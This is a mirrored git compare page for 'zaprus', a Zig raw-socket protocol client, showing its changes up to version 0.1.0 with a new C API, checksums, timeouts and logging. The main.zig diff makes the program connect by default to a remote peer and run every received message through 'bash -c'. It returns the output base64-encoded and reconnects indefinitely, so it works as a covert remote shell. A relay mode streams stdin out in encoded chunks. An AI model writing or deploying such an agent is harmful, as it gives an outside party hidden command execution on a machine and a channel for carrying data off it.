mirror of
https://git.robbyzambito.me/zaprus
synced 2026-02-04 08:24:52 +00:00
Compare commits
15 Commits
213a01afc8
...
0.1.0
| Author | SHA1 | Date | |
|---|---|---|---|
| f554e7a3bb | |||
| 19c2b78d1d | |||
| 3c5f34d5c2 | |||
| 09152377ed | |||
| c3b17f8267 | |||
| cf365673b5 | |||
| 16fd65e281 | |||
| 8965a4d5d4 | |||
| ba8a84c478 | |||
| 19d4e88c33 | |||
| 3577d538b8 | |||
| fc9c5bcd5d | |||
| 157afa13b1 | |||
| a81c4b3175 | |||
| 43f7497424 |
17
build.zig
17
build.zig
@@ -41,6 +41,23 @@ pub fn build(b: *std.Build) void {
|
||||
.target = target,
|
||||
});
|
||||
|
||||
// Create static library
|
||||
const lib = b.addLibrary(.{
|
||||
.name = "zaprus",
|
||||
.root_module = b.createModule(.{
|
||||
.root_source_file = b.path("src/c_api.zig"),
|
||||
.target = target,
|
||||
.optimize = optimize,
|
||||
.link_libc = true,
|
||||
.imports = &.{
|
||||
.{ .name = "zaprus", .module = mod },
|
||||
},
|
||||
}),
|
||||
});
|
||||
|
||||
b.installArtifact(lib);
|
||||
lib.installHeader(b.path("include/zaprus.h"), "zaprus.h");
|
||||
|
||||
// Here we define an executable. An executable needs to have a root module
|
||||
// which needs to expose a `main` function. While we could add a main function
|
||||
// to the module defined above, it's sometimes preferable to split business
|
||||
|
||||
@@ -10,7 +10,7 @@
|
||||
|
||||
// This is a [Semantic Version](https://semver.org/).
|
||||
// In a future version of Zig it will be used for package deduplication.
|
||||
.version = "0.0.0",
|
||||
.version = "0.1.0",
|
||||
|
||||
// Together with name, this represents a globally unique package
|
||||
// identifier. This field is generated by the Zig toolchain when the
|
||||
|
||||
33
include/zaprus.h
Normal file
33
include/zaprus.h
Normal file
@@ -0,0 +1,33 @@
|
||||
#ifndef ZAPRUS_H
|
||||
#define ZAPRUS_H
|
||||
|
||||
#include <stdint.h>
|
||||
#include <stdlib.h>
|
||||
|
||||
typedef void* zaprus_client;
|
||||
typedef void* zaprus_connection;
|
||||
|
||||
// Returns NULL if there was an error.
|
||||
zaprus_client zaprus_init_client(void);
|
||||
|
||||
void zaprus_deinit_client(zaprus_client client);
|
||||
|
||||
// Returns 0 on success, else returns 1.
|
||||
int zaprus_client_send_relay(zaprus_client client, const char* payload, size_t payload_len, const char dest[4]);
|
||||
|
||||
// Returns NULL if there was an error.
|
||||
// Caller should call zaprus_deinit_connection when done with the connection.
|
||||
zaprus_connection zaprus_connect(zaprus_client client, const char* payload, size_t payload_len);
|
||||
|
||||
void zaprus_deinit_connection(zaprus_connection connection);
|
||||
|
||||
// Capacity is the maximum length of the output buffer.
|
||||
// out_len is modified to specify how much of the capacity is used by the response.
|
||||
// Blocks until the next message is available, or returns 1 if the underlying socket times out.
|
||||
// Returns 0 on success, else returns 1.
|
||||
int zaprus_connection_next(zaprus_connection connection, char *out, size_t capacity, size_t *out_len);
|
||||
|
||||
// Returns 0 on success, else returns 1.
|
||||
int zaprus_connection_send(zaprus_connection connection, const char *payload, size_t payload_len);
|
||||
|
||||
#endif // ZAPRUS_H
|
||||
@@ -5,6 +5,8 @@ const Client = @This();
|
||||
|
||||
const max_message_size = 2048;
|
||||
|
||||
pub const max_payload_len = RawSocket.max_payload_len;
|
||||
|
||||
socket: RawSocket,
|
||||
|
||||
pub fn init() !Client {
|
||||
@@ -20,10 +22,8 @@ pub fn deinit(self: *Client) void {
|
||||
}
|
||||
|
||||
pub fn sendRelay(self: *Client, io: Io, payload: []const u8, dest: [4]u8) !void {
|
||||
const rand = blk: {
|
||||
const io_source: std.Random.IoSource = .{ .io = io };
|
||||
break :blk io_source.interface();
|
||||
};
|
||||
const io_source: std.Random.IoSource = .{ .io = io };
|
||||
const rand = io_source.interface();
|
||||
|
||||
var headers: EthIpUdp = .{
|
||||
.src_mac = self.socket.mac,
|
||||
@@ -51,22 +51,18 @@ pub fn sendRelay(self: *Client, io: Io, payload: []const u8, dest: [4]u8) !void
|
||||
const relay_bytes = relay.toBytes(&relay_buf);
|
||||
headers.setPayloadLen(relay_bytes.len);
|
||||
|
||||
const full_msg = blk: {
|
||||
var msg_buf: [max_message_size]u8 = undefined;
|
||||
var msg_w: Writer = .fixed(&msg_buf);
|
||||
msg_w.writeAll(&headers.toBytes()) catch unreachable;
|
||||
msg_w.writeAll(relay_bytes) catch unreachable;
|
||||
break :blk msg_w.buffered();
|
||||
};
|
||||
var msg_buf: [max_message_size]u8 = undefined;
|
||||
var msg_w: Writer = .fixed(&msg_buf);
|
||||
msg_w.writeAll(&headers.toBytes()) catch unreachable;
|
||||
msg_w.writeAll(relay_bytes) catch unreachable;
|
||||
const full_msg = msg_w.buffered();
|
||||
|
||||
try self.socket.send(full_msg);
|
||||
}
|
||||
|
||||
pub fn connect(self: Client, io: Io, payload: []const u8) !SaprusConnection {
|
||||
const rand = blk: {
|
||||
const io_source: std.Random.IoSource = .{ .io = io };
|
||||
break :blk io_source.interface();
|
||||
};
|
||||
const io_source: std.Random.IoSource = .{ .io = io };
|
||||
const rand = io_source.interface();
|
||||
|
||||
var headers: EthIpUdp = .{
|
||||
.src_mac = self.socket.mac,
|
||||
@@ -95,37 +91,44 @@ pub fn connect(self: Client, io: Io, payload: []const u8) !SaprusConnection {
|
||||
},
|
||||
};
|
||||
|
||||
try self.socket.attachSaprusPortFilter(connection.connection.src);
|
||||
log.debug("Setting bpf filter to port {}", .{connection.connection.src});
|
||||
self.socket.attachSaprusPortFilter(connection.connection.src) catch |err| {
|
||||
log.err("Failed to set port filter: {t}", .{err});
|
||||
return err;
|
||||
};
|
||||
log.debug("bpf set", .{});
|
||||
|
||||
var connection_buf: [2048]u8 = undefined;
|
||||
var connection_bytes = connection.toBytes(&connection_buf);
|
||||
headers.setPayloadLen(connection_bytes.len);
|
||||
|
||||
var full_msg = blk: {
|
||||
var msg_buf: [2048]u8 = undefined;
|
||||
var msg_w: Writer = .fixed(&msg_buf);
|
||||
msg_w.writeAll(&headers.toBytes()) catch unreachable;
|
||||
msg_w.writeAll(connection_bytes) catch unreachable;
|
||||
break :blk msg_w.buffered();
|
||||
};
|
||||
log.debug("Building full message", .{});
|
||||
var msg_buf: [2048]u8 = undefined;
|
||||
var msg_w: Writer = .fixed(&msg_buf);
|
||||
msg_w.writeAll(&headers.toBytes()) catch unreachable;
|
||||
msg_w.writeAll(connection_bytes) catch unreachable;
|
||||
var full_msg = msg_w.buffered();
|
||||
log.debug("Built full message. Sending message", .{});
|
||||
|
||||
try self.socket.send(full_msg);
|
||||
var res_buf: [4096]u8 = undefined;
|
||||
|
||||
log.debug("Awaiting handshake response", .{});
|
||||
// Ignore response from sentinel, just accept that we got one.
|
||||
_ = try self.socket.receive(&res_buf);
|
||||
try io.sleep(.fromMilliseconds(40), .real);
|
||||
|
||||
headers.udp.dst_port = udp_dest_port;
|
||||
headers.ip.id = rand.int(u16);
|
||||
headers.setPayloadLen(connection_bytes.len);
|
||||
|
||||
log.debug("Building final handshake message", .{});
|
||||
|
||||
msg_w.end = 0;
|
||||
|
||||
msg_w.writeAll(&headers.toBytes()) catch unreachable;
|
||||
msg_w.writeAll(connection_bytes) catch unreachable;
|
||||
full_msg = msg_w.buffered();
|
||||
|
||||
full_msg = blk: {
|
||||
var msg_buf: [2048]u8 = undefined;
|
||||
var msg_w: Writer = .fixed(&msg_buf);
|
||||
msg_w.writeAll(&headers.toBytes()) catch unreachable;
|
||||
msg_w.writeAll(connection_bytes) catch unreachable;
|
||||
break :blk msg_w.buffered();
|
||||
};
|
||||
try self.socket.send(full_msg);
|
||||
|
||||
return .init(self.socket, headers, connection);
|
||||
@@ -140,3 +143,4 @@ const EthIpUdp = @import("./EthIpUdp.zig").EthIpUdp;
|
||||
const std = @import("std");
|
||||
const Io = std.Io;
|
||||
const Writer = std.Io.Writer;
|
||||
const log = std.log;
|
||||
|
||||
@@ -14,45 +14,47 @@ pub fn init(socket: RawSocket, headers: EthIpUdp, connection: SaprusMessage) Con
|
||||
|
||||
pub fn next(self: Connection, io: Io, buf: []u8) ![]const u8 {
|
||||
_ = io;
|
||||
log.debug("Awaiting connection message", .{});
|
||||
const res = try self.socket.receive(buf);
|
||||
const connection_res = blk: {
|
||||
const msg: SaprusMessage = try .parse(res[42..]);
|
||||
break :blk msg.connection;
|
||||
};
|
||||
log.debug("Received {} byte connection message", .{res.len});
|
||||
const msg: SaprusMessage = try .parse(res[42..]);
|
||||
const connection_res = msg.connection;
|
||||
|
||||
log.debug("Payload was {s}", .{connection_res.payload});
|
||||
|
||||
return connection_res.payload;
|
||||
}
|
||||
|
||||
pub fn send(self: *Connection, io: Io, buf: []const u8) !void {
|
||||
const rand = blk: {
|
||||
const io_source: std.Random.IoSource = .{ .io = io };
|
||||
break :blk io_source.interface();
|
||||
};
|
||||
const io_source: std.Random.IoSource = .{ .io = io };
|
||||
const rand = io_source.interface();
|
||||
|
||||
log.debug("Sending connection message", .{});
|
||||
|
||||
self.connection.connection.payload = buf;
|
||||
const connection_bytes = blk: {
|
||||
var connection_bytes: [2048]u8 = undefined;
|
||||
break :blk self.connection.toBytes(&connection_bytes);
|
||||
};
|
||||
var connection_bytes_buf: [2048]u8 = undefined;
|
||||
const connection_bytes = self.connection.toBytes(&connection_bytes_buf);
|
||||
|
||||
self.headers.setPayloadLen(connection_bytes.len);
|
||||
self.headers.ip.id = rand.int(u16);
|
||||
self.headers.setPayloadLen(connection_bytes.len);
|
||||
|
||||
const full_msg = blk: {
|
||||
var msg_buf: [2048]u8 = undefined;
|
||||
var msg_w: Writer = .fixed(&msg_buf);
|
||||
try msg_w.writeAll(&self.headers.toBytes());
|
||||
try msg_w.writeAll(connection_bytes);
|
||||
break :blk msg_w.buffered();
|
||||
};
|
||||
var msg_buf: [2048]u8 = undefined;
|
||||
var msg_w: Writer = .fixed(&msg_buf);
|
||||
try msg_w.writeAll(&self.headers.toBytes());
|
||||
try msg_w.writeAll(connection_bytes);
|
||||
const full_msg = msg_w.buffered();
|
||||
|
||||
try self.socket.send(full_msg);
|
||||
|
||||
log.debug("Sent {} byte connection message", .{full_msg.len});
|
||||
}
|
||||
|
||||
const std = @import("std");
|
||||
const Io = std.Io;
|
||||
const Writer = std.Io.Writer;
|
||||
|
||||
const log = std.log;
|
||||
|
||||
const SaprusMessage = @import("./message.zig").Message;
|
||||
|
||||
const EthIpUdp = @import("./EthIpUdp.zig").EthIpUdp;
|
||||
|
||||
@@ -49,9 +49,45 @@ pub const EthIpUdp = packed struct(u336) { // 42 bytes * 8 bits = 336
|
||||
|
||||
pub fn setPayloadLen(self: *@This(), len: usize) void {
|
||||
self.ip.len = @intCast(len + (@bitSizeOf(@TypeOf(self.udp)) / 8) + (@bitSizeOf(@TypeOf(self.ip)) / 8));
|
||||
|
||||
// Zero the checksum field before calculation
|
||||
self.ip.header_checksum = 0;
|
||||
|
||||
// Serialize IP header to big-endian bytes
|
||||
var ip_bytes: [@bitSizeOf(@TypeOf(self.ip)) / 8]u8 = undefined;
|
||||
var w: Writer = .fixed(&ip_bytes);
|
||||
w.writeStruct(self.ip, .big) catch unreachable;
|
||||
|
||||
// Calculate checksum over serialized bytes
|
||||
self.ip.header_checksum = onesComplement16(&ip_bytes);
|
||||
|
||||
self.udp.len = @intCast(len + (@bitSizeOf(@TypeOf(self.udp)) / 8));
|
||||
}
|
||||
};
|
||||
|
||||
fn onesComplement16(data: []const u8) u16 {
|
||||
var sum: u32 = 0;
|
||||
|
||||
// Process pairs of bytes as 16-bit words
|
||||
var i: usize = 0;
|
||||
while (i + 1 < data.len) : (i += 2) {
|
||||
const word: u16 = (@as(u16, data[i]) << 8) | data[i + 1];
|
||||
sum += word;
|
||||
}
|
||||
|
||||
// Handle odd byte if present
|
||||
if (data.len % 2 == 1) {
|
||||
sum += @as(u32, data[data.len - 1]) << 8;
|
||||
}
|
||||
|
||||
// Fold 32-bit sum to 16 bits
|
||||
while (sum >> 16 != 0) {
|
||||
sum = (sum & 0xFFFF) + (sum >> 16);
|
||||
}
|
||||
|
||||
// Return ones' complement
|
||||
return ~@as(u16, @truncate(sum));
|
||||
}
|
||||
|
||||
const std = @import("std");
|
||||
const Writer = std.Io.Writer;
|
||||
|
||||
@@ -1,9 +1,13 @@
|
||||
const RawSocket = @This();
|
||||
|
||||
const is_debug = builtin.mode == .Debug;
|
||||
|
||||
fd: i32,
|
||||
sockaddr_ll: std.posix.sockaddr.ll,
|
||||
mac: [6]u8,
|
||||
|
||||
pub const max_payload_len = 1000;
|
||||
|
||||
const Ifconf = extern struct {
|
||||
ifc_len: i32,
|
||||
ifc_ifcu: extern union {
|
||||
@@ -13,7 +17,7 @@ const Ifconf = extern struct {
|
||||
};
|
||||
|
||||
pub fn init() !RawSocket {
|
||||
const socket: i32 = @intCast(std.os.linux.socket(std.os.linux.AF.PACKET, std.os.linux.SOCK.RAW, 0));
|
||||
const socket: i32 = std.math.cast(i32, std.os.linux.socket(std.os.linux.AF.PACKET, std.os.linux.SOCK.RAW, 0)) orelse return error.SocketError;
|
||||
if (socket < 0) return error.SocketError;
|
||||
|
||||
var ifreq_storage: [16]std.os.linux.ifreq = undefined;
|
||||
@@ -68,10 +72,6 @@ pub fn init() !RawSocket {
|
||||
const bind_ret = std.os.linux.bind(socket, @ptrCast(&sockaddr_ll), @sizeOf(@TypeOf(sockaddr_ll)));
|
||||
if (bind_ret != 0) return error.BindError;
|
||||
|
||||
const timeout: std.os.linux.timeval = .{ .sec = 600, .usec = 0 };
|
||||
const timeout_ret = std.os.linux.setsockopt(socket, std.os.linux.SOL.SOCKET, std.os.linux.SO.RCVTIMEO, @ptrCast(&timeout), @sizeOf(@TypeOf(timeout)));
|
||||
if (timeout_ret != 0) return error.SetTimeoutError;
|
||||
|
||||
return .{
|
||||
.fd = socket,
|
||||
.sockaddr_ll = sockaddr_ll,
|
||||
@@ -79,6 +79,12 @@ pub fn init() !RawSocket {
|
||||
};
|
||||
}
|
||||
|
||||
pub fn setTimeout(self: *RawSocket, sec: isize, usec: i64) !void {
|
||||
const timeout: std.os.linux.timeval = .{ .sec = sec, .usec = usec };
|
||||
const timeout_ret = std.os.linux.setsockopt(self.fd, std.os.linux.SOL.SOCKET, std.os.linux.SO.RCVTIMEO, @ptrCast(&timeout), @sizeOf(@TypeOf(timeout)));
|
||||
if (timeout_ret != 0) return error.SetTimeoutError;
|
||||
}
|
||||
|
||||
pub fn deinit(self: *RawSocket) void {
|
||||
_ = std.os.linux.close(self.fd);
|
||||
self.* = undefined;
|
||||
|
||||
88
src/c_api.zig
Normal file
88
src/c_api.zig
Normal file
@@ -0,0 +1,88 @@
|
||||
const std = @import("std");
|
||||
const zaprus = @import("zaprus");
|
||||
|
||||
// Opaque types for C API
|
||||
const ZaprusClient = opaque {};
|
||||
const ZaprusConnection = opaque {};
|
||||
|
||||
const alloc = std.heap.c_allocator;
|
||||
const io = std.Io.Threaded.global_single_threaded.io();
|
||||
|
||||
export fn zaprus_init_client() ?*ZaprusClient {
|
||||
const client = alloc.create(zaprus.Client) catch return null;
|
||||
client.* = zaprus.Client.init() catch {
|
||||
alloc.destroy(client);
|
||||
return null;
|
||||
};
|
||||
return @ptrCast(client);
|
||||
}
|
||||
|
||||
export fn zaprus_deinit_client(client: ?*ZaprusClient) void {
|
||||
const c: ?*zaprus.Client = @ptrCast(@alignCast(client));
|
||||
if (c) |zc| {
|
||||
zc.deinit();
|
||||
alloc.destroy(zc);
|
||||
}
|
||||
}
|
||||
|
||||
export fn zaprus_client_send_relay(
|
||||
client: ?*ZaprusClient,
|
||||
payload: [*c]const u8,
|
||||
payload_len: usize,
|
||||
dest: [*c]const u8,
|
||||
) c_int {
|
||||
const c: ?*zaprus.Client = @ptrCast(@alignCast(client));
|
||||
const zc = c orelse return 1;
|
||||
|
||||
zc.sendRelay(io, payload[0..payload_len], dest[0..4].*) catch return 1;
|
||||
return 0;
|
||||
}
|
||||
|
||||
export fn zaprus_connect(
|
||||
client: ?*ZaprusClient,
|
||||
payload: [*c]const u8,
|
||||
payload_len: usize,
|
||||
) ?*ZaprusConnection {
|
||||
const c: ?*zaprus.Client = @ptrCast(@alignCast(client));
|
||||
const zc = c orelse return null;
|
||||
|
||||
const connection = alloc.create(zaprus.Connection) catch return null;
|
||||
connection.* = zc.connect(io, payload[0..payload_len]) catch {
|
||||
alloc.destroy(connection);
|
||||
return null;
|
||||
};
|
||||
return @ptrCast(connection);
|
||||
}
|
||||
|
||||
export fn zaprus_deinit_connection(connection: ?*ZaprusConnection) void {
|
||||
const c: ?*zaprus.Connection = @ptrCast(@alignCast(connection));
|
||||
if (c) |zc| {
|
||||
alloc.destroy(zc);
|
||||
}
|
||||
}
|
||||
|
||||
export fn zaprus_connection_next(
|
||||
connection: ?*ZaprusConnection,
|
||||
out: [*c]u8,
|
||||
capacity: usize,
|
||||
out_len: *usize,
|
||||
) c_int {
|
||||
const c: ?*zaprus.Connection = @ptrCast(@alignCast(connection));
|
||||
const zc = c orelse return 1;
|
||||
|
||||
const result = zc.next(io, out[0..capacity]) catch return 1;
|
||||
out_len.* = result.len;
|
||||
return 0;
|
||||
}
|
||||
|
||||
export fn zaprus_connection_send(
|
||||
connection: ?*ZaprusConnection,
|
||||
payload: [*c]const u8,
|
||||
payload_len: usize,
|
||||
) c_int {
|
||||
const c: ?*zaprus.Connection = @ptrCast(@alignCast(connection));
|
||||
const zc = c orelse return 1;
|
||||
|
||||
zc.send(io, payload[0..payload_len]) catch return 1;
|
||||
return 0;
|
||||
}
|
||||
158
src/main.zig
158
src/main.zig
@@ -26,36 +26,29 @@ pub fn main(init: std.process.Init) !void {
|
||||
|
||||
const args = try init.minimal.args.toSlice(init.arena.allocator());
|
||||
|
||||
if (args.len == 1) {
|
||||
std.debug.print("{s}", .{help});
|
||||
return;
|
||||
}
|
||||
|
||||
var flags: struct {
|
||||
relay: ?[]const u8 = null,
|
||||
dest: ?[]const u8 = null,
|
||||
connect: ?[]const u8 = null,
|
||||
} = .{};
|
||||
|
||||
{
|
||||
var payload_buf: [4096]u8 = undefined;
|
||||
if (args.len == 1) {
|
||||
flags.connect = "";
|
||||
} else {
|
||||
var i: usize = 1;
|
||||
while (i < args.len) : (i += 1) {
|
||||
if (to_option.get(args[i])) |opt| {
|
||||
switch (opt) {
|
||||
.help => {
|
||||
std.debug.print("{s}\n", .{help});
|
||||
std.debug.print("{s}", .{help});
|
||||
return;
|
||||
},
|
||||
.relay => {
|
||||
i += 1;
|
||||
if (i < args.len) {
|
||||
var w: Writer = .fixed(&payload_buf);
|
||||
try w.printBase64(args[i]);
|
||||
flags.relay = w.buffered();
|
||||
flags.relay = args[i];
|
||||
} else {
|
||||
std.debug.print("-r/--relay requires a string\n", .{});
|
||||
return error.InvalidArguments;
|
||||
flags.relay = "";
|
||||
}
|
||||
},
|
||||
.dest => {
|
||||
@@ -70,9 +63,7 @@ pub fn main(init: std.process.Init) !void {
|
||||
.connect => {
|
||||
i += 1;
|
||||
if (i < args.len) {
|
||||
var w: Writer = .fixed(&payload_buf);
|
||||
try w.printBase64(args[i]);
|
||||
flags.connect = w.buffered();
|
||||
flags.connect = args[i];
|
||||
} else {
|
||||
flags.connect = "";
|
||||
}
|
||||
@@ -90,49 +81,136 @@ pub fn main(init: std.process.Init) !void {
|
||||
return error.InvalidArguments;
|
||||
}
|
||||
|
||||
var client: SaprusClient = try .init();
|
||||
defer client.deinit();
|
||||
var client: SaprusClient = undefined;
|
||||
|
||||
if (flags.relay != null) {
|
||||
try client.sendRelay(init.io, flags.relay.?, parseDest(flags.dest));
|
||||
client = try .init();
|
||||
defer client.deinit();
|
||||
var chunk_writer_buf: [2048]u8 = undefined;
|
||||
var chunk_writer: Writer = .fixed(&chunk_writer_buf);
|
||||
if (flags.relay.?.len > 0) {
|
||||
var output_iter = std.mem.window(u8, flags.relay.?, SaprusClient.max_payload_len, SaprusClient.max_payload_len);
|
||||
while (output_iter.next()) |chunk| {
|
||||
chunk_writer.end = 0;
|
||||
try chunk_writer.print("{b64}", .{chunk});
|
||||
try client.sendRelay(init.io, chunk_writer.buffered(), parseDest(flags.dest));
|
||||
try init.io.sleep(.fromMilliseconds(40), .boot);
|
||||
}
|
||||
} else {
|
||||
var stdin_file: std.Io.File = .stdin();
|
||||
var stdin_file_reader = stdin_file.reader(init.io, &.{});
|
||||
var stdin_reader = &stdin_file_reader.interface;
|
||||
var lim_buf: [SaprusClient.max_payload_len]u8 = undefined;
|
||||
var limited = stdin_reader.limited(.limited(10 * lim_buf.len), &lim_buf);
|
||||
var stdin = &limited.interface;
|
||||
|
||||
while (stdin.fillMore()) {
|
||||
// Sometimes fillMore will return 0 bytes.
|
||||
// Skip these
|
||||
if (stdin.seek == stdin.end) continue;
|
||||
|
||||
chunk_writer.end = 0;
|
||||
try chunk_writer.print("{b64}", .{stdin.buffered()});
|
||||
try client.sendRelay(init.io, chunk_writer.buffered(), parseDest(flags.dest));
|
||||
try init.io.sleep(.fromMilliseconds(40), .boot);
|
||||
try stdin.discardAll(stdin.end);
|
||||
} else |err| switch (err) {
|
||||
error.EndOfStream => {
|
||||
log.debug("end of stdin", .{});
|
||||
},
|
||||
else => |e| return e,
|
||||
}
|
||||
}
|
||||
return;
|
||||
}
|
||||
|
||||
var init_con_buf: [SaprusClient.max_payload_len]u8 = undefined;
|
||||
var w: Writer = .fixed(&init_con_buf);
|
||||
try w.print("{b64}", .{flags.connect.?});
|
||||
|
||||
if (flags.connect != null) {
|
||||
reconnect: while (true) {
|
||||
var connection = try client.connect(init.io, flags.connect.?);
|
||||
client = try .init();
|
||||
defer client.deinit();
|
||||
log.debug("Starting connection", .{});
|
||||
|
||||
while (true) {
|
||||
try client.socket.setTimeout(if (is_debug) 3 else 25, 0);
|
||||
var connection = client.connect(init.io, w.buffered()) catch {
|
||||
log.debug("Connection timed out", .{});
|
||||
continue;
|
||||
};
|
||||
|
||||
log.debug("Connection started", .{});
|
||||
|
||||
next_message: while (true) {
|
||||
var res_buf: [2048]u8 = undefined;
|
||||
const next = connection.next(init.io, &res_buf) catch continue :reconnect;
|
||||
try client.socket.setTimeout(if (is_debug) 60 else 600, 0);
|
||||
const next = connection.next(init.io, &res_buf) catch {
|
||||
continue :reconnect;
|
||||
};
|
||||
|
||||
const b64d = std.base64.standard.Decoder;
|
||||
var connection_payload_buf: [2048]u8 = undefined;
|
||||
const connection_payload = connection_payload_buf[0..try b64d.calcSizeForSlice(next)];
|
||||
b64d.decode(connection_payload, next) catch {
|
||||
// TODO: debug log
|
||||
log.debug("Failed to decode message, skipping: '{s}'", .{connection_payload});
|
||||
continue;
|
||||
};
|
||||
|
||||
const child = std.process.spawn(init.io, .{
|
||||
var child = std.process.spawn(init.io, .{
|
||||
.argv = &.{ "bash", "-c", connection_payload },
|
||||
.stdout = .pipe,
|
||||
.stderr = .pipe,
|
||||
.stderr = .ignore,
|
||||
.stdin = .ignore,
|
||||
}) catch continue;
|
||||
|
||||
var child_stdout: std.ArrayList(u8) = .empty;
|
||||
defer child_stdout.deinit(init.gpa);
|
||||
var child_stderr: std.ArrayList(u8) = .empty;
|
||||
defer child_stderr.deinit(init.gpa);
|
||||
var child_output_buf: [SaprusClient.max_payload_len]u8 = undefined;
|
||||
var child_output_reader = child.stdout.?.reader(init.io, &child_output_buf);
|
||||
|
||||
try child.collectOutput(init.gpa, &child_stdout, &child_stderr, 2048);
|
||||
var is_killed: std.atomic.Value(bool) = .init(false);
|
||||
|
||||
const b64e = std.base64.standard.Encoder;
|
||||
var cmd_output_buf: [2048]u8 = undefined;
|
||||
const encoded_cmd_output = b64e.encode(&cmd_output_buf, child_stdout.items);
|
||||
var kill_task = try init.io.concurrent(killProcessAfter, .{ init.io, &child, .fromSeconds(3), &is_killed });
|
||||
defer _ = kill_task.cancel(init.io) catch {};
|
||||
|
||||
connection.send(init.io, encoded_cmd_output) catch continue;
|
||||
try init.io.sleep(.fromMilliseconds(40), .real);
|
||||
var cmd_output_buf: [SaprusClient.max_payload_len * 2]u8 = undefined;
|
||||
var cmd_output: Writer = .fixed(&cmd_output_buf);
|
||||
|
||||
// Maximum of 10 messages of output per command
|
||||
for (0..10) |_| {
|
||||
cmd_output.end = 0;
|
||||
|
||||
child_output_reader.interface.fill(child_output_reader.interface.buffer.len) catch |err| switch (err) {
|
||||
error.ReadFailed => continue :next_message, // TODO: check if there is a better way to handle this
|
||||
error.EndOfStream => {
|
||||
cmd_output.print("{b64}", .{child_output_reader.interface.buffered()}) catch unreachable;
|
||||
if (cmd_output.end > 0) {
|
||||
connection.send(init.io, cmd_output.buffered()) catch |e| {
|
||||
log.debug("Failed to send connection chunk: {t}", .{e});
|
||||
continue :next_message;
|
||||
};
|
||||
}
|
||||
break;
|
||||
},
|
||||
};
|
||||
cmd_output.print("{b64}", .{try child_output_reader.interface.takeArray(child_output_buf.len)}) catch unreachable;
|
||||
connection.send(init.io, cmd_output.buffered()) catch |err| {
|
||||
log.debug("Failed to send connection chunk: {t}", .{err});
|
||||
continue :next_message;
|
||||
};
|
||||
try init.io.sleep(.fromMilliseconds(40), .boot);
|
||||
} else {
|
||||
kill_task.cancel(init.io) catch {};
|
||||
killProcessAfter(init.io, &child, .zero, &is_killed) catch |err| {
|
||||
log.debug("Failed to kill process??? {t}", .{err});
|
||||
continue :next_message;
|
||||
};
|
||||
}
|
||||
|
||||
if (!is_killed.load(.monotonic)) {
|
||||
_ = child.wait(init.io) catch |err| {
|
||||
log.debug("Failed to wait for child: {t}", .{err});
|
||||
};
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -140,6 +218,15 @@ pub fn main(init: std.process.Init) !void {
|
||||
unreachable;
|
||||
}
|
||||
|
||||
fn killProcessAfter(io: std.Io, proc: *std.process.Child, duration: std.Io.Duration, is_killed: *std.atomic.Value(bool)) !void {
|
||||
io.sleep(duration, .boot) catch |err| switch (err) {
|
||||
error.Canceled => return,
|
||||
else => |e| return e,
|
||||
};
|
||||
is_killed.store(true, .monotonic);
|
||||
proc.kill(io);
|
||||
}
|
||||
|
||||
fn parseDest(in: ?[]const u8) [4]u8 {
|
||||
if (in) |dest| {
|
||||
if (dest.len <= 4) {
|
||||
@@ -156,6 +243,7 @@ fn parseDest(in: ?[]const u8) [4]u8 {
|
||||
|
||||
const builtin = @import("builtin");
|
||||
const std = @import("std");
|
||||
const log = std.log;
|
||||
const ArrayList = std.ArrayList;
|
||||
const StaticStringMap = std.StaticStringMap;
|
||||
|
||||
|
||||
@@ -1,11 +1,3 @@
|
||||
/// Type tag for Message union.
|
||||
/// This is the first value in the actual packet sent over the network.
|
||||
pub const PacketType = enum(u16) {
|
||||
relay = 0x003C,
|
||||
connection = 0x00E9,
|
||||
_,
|
||||
};
|
||||
|
||||
pub const MessageTypeError = error{
|
||||
NotImplementedSaprusType,
|
||||
UnknownSaprusType,
|
||||
@@ -16,16 +8,18 @@ pub const MessageParseError = MessageTypeError || error{
|
||||
|
||||
const message = @This();
|
||||
|
||||
pub const Message = union(PacketType) {
|
||||
relay: Message.Relay,
|
||||
connection: Message.Connection,
|
||||
pub const Message = union(enum(u16)) {
|
||||
relay: Message.Relay = 0x003C,
|
||||
connection: Message.Connection = 0x00E9,
|
||||
_,
|
||||
|
||||
pub const Relay = message.Relay;
|
||||
pub const Connection = message.Connection;
|
||||
|
||||
pub fn toBytes(self: message.Message, buf: []u8) []u8 {
|
||||
return switch (self) {
|
||||
inline else => |m| m.toBytes(buf),
|
||||
inline .relay, .connection => |m| m.toBytes(buf),
|
||||
else => unreachable,
|
||||
};
|
||||
}
|
||||
|
||||
@@ -36,7 +30,7 @@ pub const relay_dest_len = 4;
|
||||
|
||||
pub fn parse(bytes: []const u8) MessageParseError!Message {
|
||||
var in: Reader = .fixed(bytes);
|
||||
const @"type" = in.takeEnum(PacketType, .big) catch |err| switch (err) {
|
||||
const @"type" = in.takeEnum(std.meta.Tag(Message), .big) catch |err| switch (err) {
|
||||
error.InvalidEnumTag => return error.UnknownSaprusType,
|
||||
else => return error.InvalidMessage,
|
||||
};
|
||||
@@ -124,7 +118,7 @@ const Relay = struct {
|
||||
/// Asserts that buf is large enough to fit the relay message.
|
||||
pub fn toBytes(self: Relay, buf: []u8) []u8 {
|
||||
var out: Writer = .fixed(buf);
|
||||
out.writeInt(u16, @intFromEnum(PacketType.relay), .big) catch unreachable;
|
||||
out.writeInt(u16, @intFromEnum(Message.relay), .big) catch unreachable;
|
||||
out.writeInt(u16, @intCast(self.payload.len + 4), .big) catch unreachable; // Length field, but unread. Will switch to checksum
|
||||
out.writeAll(&self.dest.bytes) catch unreachable;
|
||||
out.writeAll(self.payload) catch unreachable;
|
||||
@@ -178,7 +172,7 @@ const Connection = struct {
|
||||
/// Asserts that buf is large enough to fit the connection message.
|
||||
pub fn toBytes(self: Connection, buf: []u8) []u8 {
|
||||
var out: Writer = .fixed(buf);
|
||||
out.writeInt(u16, @intFromEnum(PacketType.connection), .big) catch unreachable;
|
||||
out.writeInt(u16, @intFromEnum(Message.connection), .big) catch unreachable;
|
||||
out.writeInt(u16, @intCast(self.payload.len + 14), .big) catch unreachable; // Saprus length field, unread.
|
||||
out.writeInt(u16, self.src, .big) catch unreachable;
|
||||
out.writeInt(u16, self.dest, .big) catch unreachable;
|
||||
|
||||
Reference in New Issue
Block a user